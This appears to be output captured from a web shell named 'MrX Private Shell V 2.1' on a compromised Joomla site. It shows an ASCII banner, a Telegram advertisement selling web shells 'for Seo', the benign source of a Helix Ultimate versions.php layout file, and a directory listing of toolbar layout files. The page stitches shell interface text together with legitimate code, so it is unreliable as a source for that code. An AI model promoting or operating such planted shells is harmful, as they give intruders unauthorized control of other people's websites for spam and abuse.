__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Helix Ultimate Framework
* @author JoomShaper https://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2021 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
*/
defined('JPATH_BASE') or die;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Session\Session;
extract($displayData);
echo HTMLHelper::_(
'bootstrap.renderModal',
'versionsModal',
array(
'url' => "index.php?option=com_contenthistory&view=history&layout=modal&tmpl=component&item_id="
. (int) $displayData['itemId']. "&type_id=" . $displayData['typeId'] . "&type_alias=" . $displayData['typeAlias']
. "&" . Session::getFormToken() . "=1",
'title' => $displayData['title'],
'height' => '100%',
'width' => '100%',
'modalWidth' => '80',
'bodyHeight' => '60',
'footer' => '<a type="button" class="btn btn-secondary" data-dismiss="modal" aria-hidden="true">'
. Text::_("JLIB_HTML_BEHAVIOR_CLOSE") . '</a>'
)
);
$id = isset($displayData['id']) ? $displayData['id'] : '';
?>
<button id="<?php echo $id; ?>" onclick="jQuery('#versionsModal').modal('show')" class="btn btn-sm btn-outline-primary" data-bs-toggle="modal" title="<?php echo $displayData['title']; ?>">
<span class="icon-archive" aria-hidden="true"></span><?php echo $displayData['title']; ?>
</button>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| group | Folder | 0775 |
|
|
| apply.php | File | 1.1 KB | 0664 |
|
| base.php | File | 295 B | 0664 |
|
| batch.php | File | 1.02 KB | 0664 |
|
| confirm.php | File | 745 B | 0664 |
|
| containerclose.php | File | 263 B | 0664 |
|
| containeropen.php | File | 423 B | 0664 |
|
| help.php | File | 718 B | 0664 |
|
| iconclass.php | File | 297 B | 0664 |
|
| link.php | File | 805 B | 0664 |
|
| modal.php | File | 1.65 KB | 0664 |
|
| popup.php | File | 844 B | 0664 |
|
| separator.php | File | 253 B | 0664 |
|
| slider.php | File | 896 B | 0664 |
|
| standard.php | File | 1.1 KB | 0664 |
|
| title.php | File | 498 B | 0664 |
|
| versions.php | File | 1.34 KB | 0664 |
|